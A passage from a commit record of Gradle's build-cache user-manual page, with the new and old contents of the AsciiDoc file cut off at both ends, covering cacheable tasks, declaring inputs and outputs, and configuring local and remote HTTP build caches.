the build script when it affects execution of the task\n\nTask types need to opt-in to task output caching using the link:{javadocPath}\/org\/gradle\/api\/tasks\/CacheableTask.html[@CacheableTask] annotation.\nNote that link:{javadocPath}\/org\/gradle\/api\/tasks\/CacheableTask.html[@CacheableTask] is not inherited by subclasses.\nCustom task types are _not_ cacheable by default.\n\n[[sec:task_output_caching_cacheable_tasks]]\n=== Built-in cacheable tasks\n\nCurrently, the following built-in Gradle tasks are cacheable:\n\n* Java toolchain:\n link:{groovyDslPath}\/org.gradle.api.tasks.compile.JavaCompile.html[JavaCompile],\n link:{groovyDslPath}\/org.gradle.api.tasks.javadoc.Javadoc.html[Javadoc]\n* Groovy toolchain:\n link:{groovyDslPath}\/org.gradle.api.tasks.compile.GroovyCompile.html[GroovyCompile],\n link:{groovyDslPath}\/org.gradle.api.tasks.javadoc.Groovydoc.html[Groovydoc]\n* Scala toolchain:\n link:{groovyDslPath}\/org.gradle.api.tasks.scala.ScalaCompile.html[ScalaCompile],\n link:{javadocPath}\/org\/gradle\/language\/scala\/tasks\/PlatformScalaCompile.html[PlatformScalaCompile],\n link:{groovyDslPath}\/org.gradle.api.tasks.scala.ScalaDoc.html[ScalaDoc]\n* Native toolchain:\n link:{javadocPath}\/org\/gradle\/language\/cpp\/tasks\/CppCompile.html[CppCompile],\n link:{javadocPath}\/org\/gradle\/language\/c\/tasks\/CCompile.html[CCompile],\n link:{javadocPath}\/org\/gradle\/language\/swift\/tasks\/SwiftCompile.html[SwiftCompile]\n* Testing:\n link:{groovyDslPath}\/org.gradle.api.tasks.testing.Test.html[Test]\n* Code quality tasks:\n link:{groovyDslPath}\/org.gradle.api.plugins.quality.Checkstyle.html[Checkstyle],\n link:{groovyDslPath}\/org.gradle.api.plugins.quality.CodeNarc.html[CodeNarc],\n link:{groovyDslPath}\/org.gradle.api.plugins.quality.Pmd.html[Pmd]\n* JaCoCo:\n link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html[JacocoReport]\n* Other tasks:\n link:{groovyDslPath}\/org.gradle.api.plugins.antlr.AntlrTask.html[AntlrTask],\n link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html[ValidatePlugins],\n link:{groovyDslPath}\/org.gradle.api.tasks.WriteProperties.html[WriteProperties]\n\nAll other built-in tasks are currently not cacheable.\n\nSome tasks, like link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html[Copy] or link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar], usually do not make sense to make cacheable because Gradle is only copying files from one location to another.\nIt also doesn't make sense to make tasks cacheable that do not produce outputs or have no task actions.\n\n[[sec:task_output_caching_cacheable_3rd_party]]\n=== Third party plugins\n\nThere are third party plugins that work well with the build cache.\nThe most prominent examples are the https:\/\/developer.android.com\/studio\/releases\/gradle-plugin.html[Android plugin 3.1+] and the https:\/\/blog.gradle.org\/kotlin-build-cache-use[Kotlin plugin 1.2.21+].\nFor other third party plugins, check their documentation to find out whether they support the build cache.\n\n[[sec:task_output_caching_inputs]]\n=== Declaring task inputs and outputs\n\nIt is very important that a cacheable task has a complete picture of its inputs and outputs, so that the results from one build can be safely re-used somewhere else.\n\nMissing task inputs can cause incorrect cache hits, where different results are treated as identical because the same cache key is used by both executions.\nMissing task outputs can cause build failures if Gradle does not completely capture all outputs for a given task.\nWrongly declared task inputs can lead to cache misses especially when containing volatile data or absolute paths.\n(See <<more_about_tasks.adoc#sec:task_inputs_outputs,the section called \"Task inputs and outputs\">> on what should be declared as inputs and outputs.)\n\n[NOTE]\n====\nThe task path is _not_ an input to the build cache key.\nThis means that tasks with different task paths can re-use each other's outputs as long as Gradle determines that executing them yields the same result.\n====\n\nIn order to ensure that the inputs and outputs are properly declared use integration tests (for example using TestKit) to check that a task produces the same outputs for identical inputs and captures all output files for the task.\nWe suggest adding tests to ensure that the task inputs are relocatable, i.e. that the task can be loaded from the cache into a different build directory (see link:{javadocPath}\/org\/gradle\/api\/tasks\/PathSensitive.html[@PathSensitive]).\n\nIn order to handle volatile inputs for your tasks consider <<more_about_tasks.adoc#sec:configure_input_normalization,configuring input normalization>>.\n\n[[sec:task_output_caching_disabled_by_default]]\n=== Marking tasks as non-cacheable by default\n\nThere are certain tasks that don't benefit from using the build cache.\nOne example is a task that only moves data around the file system, like a `Copy` task.\nYou can signify that a task is not to be cached by adding the `@DisableCachingByDefault` annotation to it.\nYou can also give a human-readable reason for not caching the task by default.\nThe annotation can be used on its own, or together with `@CacheableTask`.\n\n[NOTE]\n====\nThis annotation is only for documenting the reason behind not caching the task by default.\nBuild logic can override this decision via the runtime API (see below).\n====\n\n== Enable caching of non-cacheable tasks\n\nAs we have seen, built-in tasks, or tasks provided by plugins, are cacheable if their class is annotated with the `Cacheable` annotation.\nBut what if you want to make cacheable a task whose class is not cacheable?\nLet's take a concrete example: your build script uses a generic `NpmTask` task to create a JavaScript bundle by delegating to NPM (and running `npm run bundle`).\nThis process is similar to a complex compilation task, but `NpmTask` is too generic to be cacheable by default: it just takes arguments and runs npm with those arguments.\n\nThe inputs and outputs of this task are simple to figure out.\nThe inputs are the directory containing the JavaScript files, and the NPM configuration files.\nThe output is the bundle file generated by this task.\n\n=== Using annotations\n\nWe create a subclass of the `NpmTask` and use <<more_about_tasks.adoc#sec:task_input_output_annotations,annotations to declare the inputs and outputs>>.\n\nWhen possible, it is better to use delegation instead of creating a subclass.\nThat is the case for the built in `JavaExec`, `Exec`, `Copy` and `Sync` tasks, which have a method on `Project` to do the actual work.\n\nIf you're a modern JavaScript developer, you know that bundling can be quite long, and is worth caching.\nTo achieve that, we need to tell Gradle that it's allowed to cache the output of that task, using the link:{javadocPath}\/org\/gradle\/api\/tasks\/CacheableTask.html[@CacheableTask] annotation.\n\nThis is sufficient to make the task cacheable on your own machine.\nHowever, input files are identified by default by their absolute path.\nSo if the cache needs to be shared between several developers or machines using different paths, that won't work as expected.\nSo we also need to set the <<build_cache_concepts.adoc#relocatability,path sensitivity>>.\nIn this case, the relative path of the input files can be used to identify them.\n\nNote that it is possible to override property annotations from the base class by overriding the getter of the base class and annotating that method.\n\n.Custom cacheable BundleTask\n====\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle-task\/groovy\",files=\"build.gradle[tags=bundle-task]\"]\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle-task\/kotlin\",files=\"build.gradle.kts[tags=bundle-task]\"]\n====\n- (1) Add `@CacheableTask` to enable caching for the task.\n- (2) Override the getter of a property of the base class to change the input annotation to `@Internal`.\n- (3) (4) Declare the path sensitivity.\n\n=== Using the runtime API\n\nIf for some reason you cannot create a new custom task class, it is also possible to make a task cacheable using the <<more_about_tasks.adoc#sec:task_input_output_runtime_api,runtime API>> to declare the inputs and outputs.\n\nFor enabling caching for the task you need to use the link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#cacheIf-org.gradle.api.specs.Spec-[TaskOutputs.cacheIf()] method.\n\nThe declarations via the runtime API have the same effect as the annotations described above.\nNote that you cannot override file inputs and outputs via the runtime API.\nInput properties can be overridden by specifying the same property name.\n\n.Make the bundle task cacheable\n====\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle\/groovy\",files=\"build.gradle[tags=bundle-task]\"]\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle\/kotlin\",files=\"build.gradle.kts[tags=bundle-task]\"]\n====\n\n[[sec:build_cache_configure]]\n== Configure the Build Cache\n\nYou can configure the build cache by using the link:{groovyDslPath}\/org.gradle.api.initialization.Settings.html#org.gradle.api.initialization.Settings:buildCache(org.gradle.api.Action)[Settings.buildCache(org.gradle.api.Action)] block in `settings.gradle`.\n\nGradle supports a `local` and a `remote` build cache that can be configured separately.\nWhen both build caches are enabled, Gradle tries to load build outputs from the local build cache first, and then tries the remote build cache if no build outputs are found.\nIf outputs are found in the remote cache, they are also stored in the local cache, so next time they will be found locally.\nGradle stores (\"pushes\") build outputs in any build cache that is enabled and has link:{javadocPath}\/org\/gradle\/caching\/configuration\/BuildCache.html#isPush--[BuildCache.isPush()] set to `true`.\n\nBy default, the local build cache has push enabled, and the remote build cache has push disabled.\n\nThe local build cache is pre-configured to be a link:{groovyDslPath}\/org.gradle.caching.local.DirectoryBuildCache.html[DirectoryBuildCache] and enabled by default.\nThe remote build cache can be configured by specifying the type of build cache to connect to (link:{groovyDslPath}\/org.gradle.caching.configuration.BuildCacheConfiguration.html#org.gradle.caching.configuration.BuildCacheConfiguration:remote(java.lang.Class)[BuildCacheConfiguration.remote(java.lang.Class)]).\n\n[[sec:build_cache_configure_local]]\n=== Built-in local build cache\n\nThe built-in local build cache, link:{groovyDslPath}\/org.gradle.caching.local.DirectoryBuildCache.html[DirectoryBuildCache], uses a directory to store build cache artifacts.\nBy default, this directory resides in the Gradle user home directory, but its location is configurable.\n\nGradle will periodically clean-up the local cache directory by removing entries that have not been used recently to conserve disk space.\nHow often Gradle will perform this clean-up is configurable as shown in the example below.\nNote that cache entries are cleaned-up regardless of the project they were produced by.\nIf different projects configure this clean-up to run at different periods, the shortest period will clean-up cache entries for all projects.\nTherefore it is recommended to configure this setting globally in the <<init_scripts.adoc#sec:using_an_init_script,init script>>.\nThe <<sec:build_cache_configure_use_cases, Configuration use-cases>> section has an example of putting cache configuration in the init script.\n\nFor more details on the configuration options refer to the DSL documentation of link:{groovyDslPath}\/org.gradle.caching.local.DirectoryBuildCache.html[DirectoryBuildCache].\nHere is an example of the configuration.\n\n.Configure the local cache\n====\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/groovy\",files=\"settings.gradle[tags=configure-directory-build-cache]\"]\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/kotlin\",files=\"settings.gradle.kts[tags=configure-directory-build-cache]\"]\n====\n\n[[sec:build_cache_configure_remote]]\n=== Remote HTTP build cache\n\nlink:{groovyDslPath}\/org.gradle.caching.http.HttpBuildCache.html[HttpBuildCache] provides the ability read to and write from a remote cache via HTTP.\n\nWith the following configuration, the local build cache will be used for storing build outputs while the local and the remote build cache will be used for retrieving build outputs.\n\n.Load from HttpBuildCache\n====\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/groovy\",files=\"settings.gradle[tags=http-build-cache]\"]\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/kotlin\",files=\"settings.gradle.kts[tags=http-build-cache]\"]\n====\n\nWhen attempting to load an entry, a `GET` request is made to `\\https:\/\/example.com:8123\/cache\/\u00abcache-key\u00bb`.\nThe response must have a `2xx` status and the cache entry as the body, or a `404 Not Found` status if the entry does not exist.\n\nWhen attempting to store an entry, a `PUT` request is made to `\\https:\/\/example.com:8123\/cache\/\u00abcache-key\u00bb`.\nAny `2xx` response status is interpreted as success.\nA `413 Payload Too Large` response may be returned to indicate that the payload is larger than the server will accept, which will not be treated as an error.\n\n==== Specifying access credentials\n\nhttps:\/\/en.wikipedia.org\/wiki\/Basic_access_authentication[HTTP Basic Authentication] is supported, with credentials being sent preemptively.\n\n.Specifying access credentials\n====\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/groovy\",files=\"settings.gradle[tags=configure-http-build-cache]\"]\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/kotlin\",files=\"settings.gradle.kts[tags=configure-http-build-cache]\"]\n====\n\n[[sec:build_cache_redirects]]\n==== Redirects\n\n`3xx` redirecting responses will be followed automatically.\n\nServers must take care when redirecting `PUT` requests as only `307` and `308` redirect responses will be followed with a `PUT` request.\nAll other redirect responses will be followed with a `GET` request, as per https:\/\/datatracker.ietf.org\/doc\/html\/rfc7231#page-54[RFC 7231],\nwithout the entry payload as the body.\n\n[[sec:build_cache_error_handling]]\n==== Network error handling\n\nRequests that fail during request transmission, after having established a TCP connection, will be retried automatically.\n\nThis prevents temporary problems, such as connection drops, read or write timeouts, and low level network failures such as a connection resets, causing cache operations to fail and disabling the remote cache for the remainder of the build.\n\nRequests will be retried up to 3 times.\nIf the problem persists, the cache operation will fail and the remote cache will be disabled for the remainder of the build.\n\n==== Using SSL\n\nBy default, use of HTTPS requires the server to present a certificate that is trusted by the build's Java runtime.\nIf your server's certificate is not trusted, you can:\n\n1. Update the trust store of your Java runtime to allow it to be trusted\n2. Change the <<build_environment.adoc#build_environment,build environment>> to use an alternative trust store for the build runtime\n3. Disable the requirement for a trusted certificate\n\nThe trust requirement can be disabled by setting link:{groovyDslPath}\/org.gradle.caching.http.HttpBuildCache.html#org.gradle.caching.http.HttpBuildCache:allowUntrustedServer[HttpBuildCache.isAllowUntrustedServer()] to `true`.\nEnabling this option is a security risk, as it allows any cache server to impersonate the intended server.\nIt should only be used as a temporary measure or in very tightly controlled network environments.\n\n.Allow untrusted cache server\n====\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/groovy\",files=\"settings.gradle[tags=allow-untrusted-server]\"]\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/kotlin\",files=\"settings.gradle.kts[tags=allow-untrusted-server]\"]\n====\n\n[[sec:build_cache_expect_continue]]\n==== HTTP expect-continue\n\nUse of https:\/\/www.w3.org\/Protocols\/rfc2616\/rfc2616-sec8.html#sec8.2.3[HTTP Expect-Continue] can be enabled.\nThis causes upload requests to happen in two parts: first a check whether a body would be accepted, then transmission of the body if the server indicates it will accept it.\n\nThis is useful when uploading to cache servers that routinely redirect or reject upload requests,\nas it avoids uploading the cache entry just to have it rejected (e.g. the cache entry is larger than the cache will allow) or redirected.\nThis additional check incurs extra latency when the server accepts the request, but reduces latency when the request is rejected or redirected.\n\nNot all HTTP servers and proxies reliably implement Expect-Continue.\nBe sure to check that your cache server does support it before enabling.\n\nTo enable, set link:{groovyDslPath}\/org.gradle.caching.http.HttpBuildCache.html#org.gradle.caching.http.HttpBuildCache:useExpectContinue[HttpBuildCache.isUseExpectContinue()] to `true`.\n\n.Use Expect-Continue\n====\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/groovy\",files=\"settings.gradle[tags=use-expect-continue]\"]\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/kotlin\",files=\"settings.gradle.kts[tags=use-expect-continue]\"]\n====\n\n[[sec:build_cache_configure_use_cases]]\n=== Configuration use cases\n\nThe recommended use case for the remote build cache is that your continuous integration server populates it from clean builds while developers only load from it.\nThe configuration would then look as follows.\n\n.Recommended setup for CI push use case\n====\ninclude::sample[dir=\"snippets\/buildCache\/developer-ci-setup\/groovy\",files=\"settings.gradle[tags=developer-ci-setup]\"]\ninclude::sample[dir=\"snippets\/buildCache\/developer-ci-setup\/kotlin\",files=\"settings.gradle.kts[tags=developer-ci-setup]\"]\n====\n\nIt is also possible to configure the build cache from an <<init_scripts.adoc#sec:using_an_init_script,init script>>, which can be used from the command line, added to your Gradle user home or be a part of your custom Gradle distribution.\n\n.Init script to configure the build cache\n====\ninclude::sample[dir=\"snippets\/buildCache\/configure-by-init-script\/groovy\",files=\"init.gradle[]\"]\ninclude::sample[dir=\"snippets\/buildCache\/configure-by-init-script\/kotlin\",files=\"init.gradle.kts[]\"]\n====\n\n[[sec:build_cache_composite]]\n=== Build cache, composite builds and `buildSrc`\n\nGradle's <<composite_builds.adoc#composite_builds,composite build feature>> allows including other complete Gradle builds into another.\nSuch included builds will inherit the build cache configuration from the top level build, regardless of whether the included builds define build cache configuration themselves or not.\n\nThe build cache configuration present for any included build is effectively ignored, in favour of the top level build's configuration.\nThis also applies to any `buildSrc` projects of any included builds.\n\nThe <<organizing_gradle_projects.adoc#sec:build_sources,`buildSrc` directory>> is treated as an <<composite_builds.adoc#composite_build_intro,included build>>, and as such it inherits the build cache configuration from the top-level build.\n\n[NOTE]\n====\nThis configuration precedence does not apply to <<composite_builds.adoc#included_plugin_builds,plugin builds>> included through `pluginManagement` as these are loaded _before_ the cache configuration itself.\n====\n\n[[sec:build_cache_setup_http_backend]]\n== How to set up an HTTP build cache backend\n\nGradle provides a Docker image for a link:https:\/\/hub.docker.com\/r\/gradle\/build-cache-node\/[build cache node], which can connect with Gradle Enterprise for centralized management.\nThe cache node can also be used without a Gradle Enterprise installation with restricted functionality.\n\n[[sec:build_cache_implement]]\n== Implement your own Build Cache\n\nUsing a different build cache backend to store build outputs (which is not covered by the built-in support for connecting to an HTTP backend) requires implementing\nyour own logic for connecting to your custom build cache backend.\nTo this end, custom build cache types can be registered via link:{javadocPath}\/org\/gradle\/caching\/configuration\/BuildCacheConfiguration.html#registerBuildCacheService-java.lang.Class-java.lang.Class-[BuildCacheConfiguration.registerBuildCacheService(java.lang.Class, java.lang.Class)].\n\nlink:https:\/\/gradle.com\/build-cache[Gradle Enterprise] includes a high-performance, easy to install and operate, shared build cache backend.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[build_cache]]\n= Build Cache\n\nTIP: Want to learn the tips and tricks top engineering teams use to keep builds fast and performant? https:\/\/gradle.com\/training\/#build-cache-deep-dive[Register here] for our Build Cache Training.\n\n[[sec:build_cache_intro]]\n== Overview\n\nThe Gradle _build cache_ is a cache mechanism that aims to save time by reusing outputs produced by other builds.\nThe build cache works by storing (locally or remotely) build outputs and allowing builds to fetch these outputs from the cache when it is determined that inputs have not changed, avoiding the expensive work of regenerating them.\n\nA first feature using the build cache is _task output caching_.\nEssentially, task output caching leverages the same intelligence as <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>> that Gradle uses to avoid work when a previous local build has already produced a set of task outputs.\nBut instead of being limited to the previous build in the same workspace, task output caching allows Gradle to reuse task outputs from any earlier build in any location on the local machine.\nWhen using a shared build cache for task output caching this even works across developer machines and build agents.\n\nApart from tasks, <<artifact_transforms.adoc#sec:abm_artifact_transforms,artifact transforms>> can also leverage the build cache and re-use their outputs similarly to task output caching.\n\nTIP: For a hands-on approach to learning how to use the build cache, start with reading through the <<build_cache_use_cases.adoc#use_cases_cache,use cases for the build cache>> and the follow up sections.\nIt covers the different scenarios that caching can improve and has detailed discussions of the different caveats you need to be aware of when enabling caching for a build.\n\n[[sec:build_cache_enable]]\n== Enable the Build Cache\n\nBy default, the build cache is not enabled. You can enable the build cache in a couple of ways:\n\nRun with `--build-cache` on the command-line::\nGradle will use the build cache for this build only.\nPut `org.gradle.caching=true` in your `gradle.properties`::\nGradle will try to reuse outputs from previous builds for all builds, unless explicitly disabled with `--no-build-cache`.\n\nWhen the build cache is enabled, it will store build outputs in the Gradle user home.\nFor configuring this directory or different kinds of build caches see <<#sec:build_cache_configure,Configure the Build Cache>>.\n\n[[sec:task_output_caching]]\n== Task Output Caching\n\nBeyond incremental builds described in <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>>, Gradle can save time by reusing outputs from previous executions of a task by matching inputs to the task.\nTask outputs can be reused between builds on one computer or even between builds running on different computers via a build cache.\n\nWe have focused on the use case where users have an organization-wide remote build cache that is populated regularly by continuous integration builds.\nDevelopers and other continuous integration agents should load cache entries from the remote build cache.\nWe expect that developers will not be allowed to populate the remote build cache, and all continuous integration builds populate the build cache after running the `clean` task.\n\nFor your build to play well with task output caching it must work well with the <<more_about_tasks.adoc#sec:up_to_date_checks,incremental build>> feature.\nFor example, when running your build twice in a row all tasks with outputs should be `UP-TO-DATE`.\nYou cannot expect faster builds or correct builds when enabling task output caching when this prerequisite is not met.\n\nTask output caching is automatically enabled when you enable the build cache, see <<#sec:build_cache_enable,Enable the Build Cache>>.\n\n[[sec:task_output_caching_example]]\n=== What does it look like\n\nLet us start with a project using the Java plugin which has a few Java source files. We run the build the first time.\n\n----\n> gradle --build-cache compileJava\n:compileJava\n:processResources\n:classes\n:jar\n:assemble\n\nBUILD SUCCESSFUL\n----\n\nWe see the directory used by the local build cache in the output. Apart from that the build was the same as without the build cache.\nLet's clean and run the build again.\n\n----\n> gradle clean\n:clean\n\nBUILD SUCCESSFUL\n----\n\n----\n> gradle --build-cache assemble\n:compileJava FROM-CACHE\n:processResources\n:classes\n:jar\n:assemble\n\nBUILD SUCCESSFUL\n----\n\nNow we see that, instead of executing the `:compileJava` task, the outputs of the task have been loaded from the build cache.\nThe other tasks have not been loaded from the build cache since they are not cacheable. This is due to\n`:classes` and `:assemble` being <<more_about_tasks.adoc#sec:lifecycle_tasks,lifecycle tasks>> and `:processResources`\nand `:jar` being Copy-like tasks which are not cacheable since it is generally faster to execute them.\n\n[[sec:task_output_caching_details]]\n== Cacheable tasks\n\nSince a task describes all of its inputs and outputs, Gradle can compute a _build cache key_ that uniquely defines the task's outputs based on its inputs.\nThat build cache key is used to request previous outputs from a build cache or store new outputs in the build cache.\nIf the previous build outputs have been already stored in the cache by someone else, e.g. your continuous integration server or other developers, you can avoid executing most tasks locally.\n\nThe following inputs contribute to the build cache key for a task in the same way that they do for <<more_about_tasks.adoc#sec:how_does_it_work,up-to-date checks>>:\n\n* The task type and its classpath\n* The names of the output properties\n* The names and values of properties annotated as described in <<more_about_tasks.adoc#sec:task_input_output_annotations,the section called \"Custom task types\">>\n* The names and values of properties added by the DSL via link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskInputs.html[TaskInputs]\n* The classpath of the Gradle distribution, buildSrc and plugins\n* The content of the build script when it affects execution of the task\n\nTask types need to opt-in to task output caching using the link:{javadocPath}\/org\/gradle\/api\/tasks\/CacheableTask.html[@CacheableTask] annotation.\nNote that link:{javadocPath}\/org\/gradle\/api\/tasks\/CacheableTask.html[@CacheableTask] is not inherited by subclasses.\nCustom task types are _not_ cacheable by default.\n\n[[sec:task_output_caching_cacheable_tasks]]\n=== Built-in cacheable tasks\n\nCurrently, the following built-in Gradle tasks are cacheable:\n\n* Java toolchain:\n link:{groovyDslPath}\/org.gradle.api.tasks.compile.JavaCompile.html[JavaCompile],\n link:{groovyDslPath}\/org.gradle.api.tasks.javadoc.Javadoc.html[Javadoc]\n* Groovy toolchain:\n link:{groovyDslPath}\/org.gradle.api.tasks.compile.GroovyCompile.html[GroovyCompile],\n link:{groovyDslPath}\/org.gradle.api.tasks.javadoc.Groovydoc.html[Groovydoc]\n* Scala toolchain:\n link:{groovyDslPath}\/org.gradle.api.tasks.scala.ScalaCompile.html[ScalaCompile],\n link:{javadocPath}\/org\/gradle\/language\/scala\/tasks\/PlatformScalaCompile.html[PlatformScalaCompile],\n link:{groovyDslPath}\/org.gradle.api.tasks.scala.ScalaDoc.html[ScalaDoc]\n* Native toolchain:\n link:{javadocPath}\/org\/gradle\/language\/cpp\/tasks\/CppCompile.html[CppCompile],\n link:{javadocPath}\/org\/gradle\/language\/c\/tasks\/CCompile.html[CCompile],\n link:{javadocPath}\/org\/gradle\/language\/swift\/tasks\/SwiftCompile.html[SwiftCompile]\n* Testing:\n link:{groovyDslPath}\/org.gradle.api.tasks.testing.Test.html[Test]\n* Code quality tasks:\n link:{groovyDslPath}\/org.gradle.api.plugins.quality.Checkstyle.html[Checkstyle],\n link:{groovyDslPath}\/org.gradle.api.plugins.quality.CodeNarc.html[CodeNarc],\n link:{groovyDslPath}\/org.gradle.api.plugins.quality.Pmd.html[Pmd]\n* JaCoCo:\n link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html[JacocoReport]\n* Other tasks:\n link:{groovyDslPath}\/org.gradle.api.plugins.antlr.AntlrTask.html[AntlrTask],\n link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html[ValidatePlugins],\n link:{groovyDslPath}\/org.gradle.api.tasks.WriteProperties.html[WriteProperties]\n\nAll other built-in tasks are currently not cacheable.\n\nSome tasks, like link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html[Copy] or link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar], usually do not make sense to make cacheable because Gradle is only copying files from one location to another.\nIt also doesn't make sense to make tasks cacheable that do not produce outputs or have no task actions.\n\n[[sec:task_output_caching_cacheable_3rd_party]]\n=== Third party plugins\n\nThere are third party plugins that work well with the build cache.\nThe most prominent examples are the https:\/\/developer.android.com\/studio\/releases\/gradle-plugin.html[Android plugin 3.1+] and the https:\/\/blog.gradle.org\/kotlin-build-cache-use[Kotlin plugin 1.2.21+].\nFor other third party plugins, check their documentation to find out whether they support the build cache.\n\n[[sec:task_output_caching_inputs]]\n=== Declaring task inputs and outputs\n\nIt is very important that a cacheable task has a complete picture of its inputs and outputs, so that the results from one build can be safely re-used somewhere else.\n\nMissing task inputs can cause incorrect cache hits, where different results are treated as identical because the same cache key is used by both executions.\nMissing task outputs can cause build failures if Gradle does not completely capture all outputs for a given task.\nWrongly declared task inputs can lead to cache misses especially when containing volatile data or absolute paths.\n(See <<more_about_tasks.adoc#sec:task_inputs_outputs,the section called \"Task inputs and outputs\">> on what should be declared as inputs and outputs.)\n\n[NOTE]\n====\nThe task path is _not_ an input to the build cache key.\nThis means that tasks with different task paths can re-use each other's outputs as long as Gradle determines that executing them yields the same result.\n====\n\nIn order to ensure that the inputs and outputs are properly declared use integration tests (for example using TestKit) to check that a task produces the same outputs for identical inputs and captures all output files for the task.\nWe suggest adding tests to ensure that the task inputs are relocatable, i.e. that the task can be loaded from the cache into a different build directory (see link:{javadocPath}\/org\/gradle\/api\/tasks\/PathSensitive.html[@PathSensitive]).\n\nIn order to handle volatile inputs for your tasks consider <<more_about_tasks.adoc#sec:configure_input_normalization,configuring input normalization>>.\n\n[[sec:task_output_caching_disabled_by_default]]\n=== Marking tasks as non-cacheable by default\n\nThere are certain tasks that don't benefit from using the build cache.\nOne example is a task that only moves data around the file system, like a `Copy` task.\nYou can signify that a task is not to be cached by adding the `@DisableCachingByDefault` annotation to it.\nYou can also give a human-readable reason for not caching the task by default.\nThe annotation can be used on its own, or together with `@CacheableTask`.\n\n[NOTE]\n====\nThis annotation is only for documenting the reason behind not caching the task by default.\nBuild logic can override this decision via the runtime API (see below).\n====\n\n== Enable caching of non-cacheable tasks\n\nAs we have seen, built-in tasks, or tasks provided by plugins, are cacheable if their class is annotated with the `Cacheable` annotation.\nBut what if you want to make cacheable a task whose class is not cacheable?\nLet's take a concrete example: your build script uses a generic `NpmTask` task to create a JavaScript bundle by delegating to NPM (and running `npm run bundle`).\nThis process is similar to a complex compilation task, but `NpmTask` is too generic to be cacheable by default: it just takes arguments and runs npm with those arguments.\n\nThe inputs and outputs of this task are simple to figure out.\nThe inputs are the directory containing the JavaScript files, and the NPM configuration files.\nThe output is the bundle file generated by this task.\n\n=== Using annotations\n\nWe create a subclass of the `NpmTask` and use <<more_about_tasks.adoc#sec:task_input_output_annotations,annotations to declare the inputs and outputs>>.\n\nWhen possible, it is better to use delegation instead of creating a subclass.\nThat is the case for the built in `JavaExec`, `Exec`, `Copy` and `Sync` tasks, which have a method on `Project` to do the actual work.\n\nIf you're a modern JavaScript developer, you know that bundling can be quite long, and is worth caching.\nTo achieve that, we need to tell Gradle that it's allowed to cache the output of that task, using the link:{javadocPath}\/org\/gradle\/api\/tasks\/CacheableTask.html[@CacheableTask] annotation.\n\nThis is sufficient to make the task cacheable on your own machine.\nHowever, input files are identified by default by their absolute path.\nSo if the cache needs to be shared between several developers or machines using different paths, that won't work as expected.\nSo we also need to set the <<build_cache_concepts.adoc#relocatability,path sensitivity>>.\nIn this case, the relative path of the input files can be used to identify them.\n\nNote that it is possible to override property annotations from the base class by overriding the getter of the base class and annotating that method.\n\n.Custom cacheable BundleTask\n====\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle-task\/groovy\",files=\"build.gradle[tags=bundle-task]\"]\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle-task\/kotlin\",files=\"build.gradle.kts[tags=bundle-task]\"]\n====\n- (1) Add `@CacheableTask` to enable caching for the task.\n- (2) Override the getter of a property of the base class to change the input annotation to `@Internal`.\n- (3) (4) Declare the path sensitivity.\n\n=== Using the runtime API\n\nIf for some reason you cannot create a new custom task class, it is also possible to make a task cacheable using the <<more_about_tasks.adoc#sec:task_input_output_runtime_api,runtime API>> to declare the inputs and outputs.\n\nFor enabling caching for the task you need to use the link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#cacheIf-org.gradle.api.specs.Spec-[TaskOutputs.cacheIf()] method.\n\nThe declarations via the runtime API have the same effect as the annotations described above.\nNote that you cannot override file inputs and outputs via the runtime API.\nInput properties can be overridden by specifying the same property name.\n\n.Make the bundle task cacheable\n====\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle\/groovy\",files=\"build.gradle[tags=bundle-task]\"]\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle\/kotlin\",files=\"build.gradle.kts[tags=bundle-task]\"]\n====\n\n[[sec:build_cache_configure]]\n== Configure the Build Cache\n\nYou can configure the build cache by using the link:{groovyDslPath}\/org.gradle.api.initialization.Settings.html#org.gradle.api.initialization.Settings:buildCache(org.gradle.api.Action)[Settings.buildCache(org.gradle.api.Action)] block in `settings.gradle`.\n\nGradle supports a `local` and a `remote` build cache that can be configured separately.\nWhen both build caches are enabled, Gradle tries to load build outputs from the local build cache first, and then tries the remote build cache if no build outputs are found.\nIf outputs are found in the remote cache, they are also stored in the local cache, so next time they will be found locally.\nGradle stores (\"pushes\") build outputs in any build cache that is enabled and has 